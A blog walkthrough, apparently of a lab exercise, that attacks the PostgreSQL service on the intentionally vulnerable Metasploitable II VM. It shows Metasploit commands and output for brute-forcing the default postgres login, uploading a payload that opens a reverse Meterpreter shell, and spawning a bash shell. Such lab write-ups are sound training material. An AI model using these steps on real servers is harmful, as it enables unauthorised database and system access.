Saturday, February 15, 2020

Metasploitable II: POSTGRES SQL Server

In Metasploitable II there exists a postgres sql server on the system. Our goal is to exploit the remote server in two ways to gain shell access to the remote host.

We can use the postgres_login module for help us brute force a correct login for the postgres sql server.

msf5 > use auxiliary/scanner/postgres/postgres_login 
msf5 auxiliary(scanner/postgres/postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                              Required  Description
   ----              ---------------                                                              --------  -----------
   BLANK_PASSWORDS   false                                                                        no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                            yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                    yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                        no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                        no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                        no        Add all users in the current database to the list
   PASSWORD                                                                                       no        A specific password to authenticate with
   PASS_FILE         /home/sam/metasploit-framework/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                         no        Set to true to see query result sets
   RHOSTS                                                                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT             5432                                                                         yes       The target port
   STOP_ON_SUCCESS   false                                                                        yes       Stop guessing when a credential works for a host
   THREADS           1                                                                            yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                       no        A specific username to authenticate as
   USERPASS_FILE     /home/sam/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no        File containing (space-separated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                        no        Try the username as the password for all users
   USER_FILE         /home/sam/metasploit-framework/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                         yes       Whether to print output for all attempts

msf5 auxiliary(scanner/postgres/postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(scanner/postgres/postgres_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.101:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 192.168.56.101:5432 - Login Successful: postgres:postgres@template1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/postgres/postgres_login) >

As you can see we found a correct login for the postgres sql server. Now its time to move on and try and get a system shell. For this we are going to be using the postgres_payload module of the metasploit framework.

msf5 > use exploit/linux/postgres/postgres_payload 
msf5 exploit(linux/postgres/postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf5 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/JAkIxpbf.so, should be cleaned up automatically
[*] Sending stage (985320 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:47858) at 2020-02-15 11:27:10 -0700

meterpreter > shell
Process 4825 created.
Channel 1 created.
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)
python -c 'import pty;pty.spawn("/bin/bash")'
postgres@metasploitable:~/8.3/main$ pwd
pwd
/var/lib/postgresql/8.3/main
postgres@metasploitable:~/8.3/main$

As you can see successfully got a shell back from the payload.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • bWAPP Remote & Local File Inclusion (RFI/LFI)
    In bWAPP There is a module for RFI and LFI injections. Our goal is to exploit these vulnerabilities and get local access to the remote mac...
  • Socat Encrypted Bind and Reverse shells
    Encrypted Bind Shell First we need to generate a new openssl key to use with our bind shell. Victim Box: user@debian:~$ openssl req -ne...
  • DVWA: SQL Injection (Blind) with sqlmap
    We start off by getting the database names hosted on the remote server. sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192...
  • Exploring NTP servers
    The ntpupdate command is used for updating your system time from a remote NTP server root@asus:~/unix% ntpdate -d 48.21.33.124 24 Sep 11:...
  • Metasploitable II: Samba Shares
    Lets first start off with an nmap scan of the remote host. root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( ht...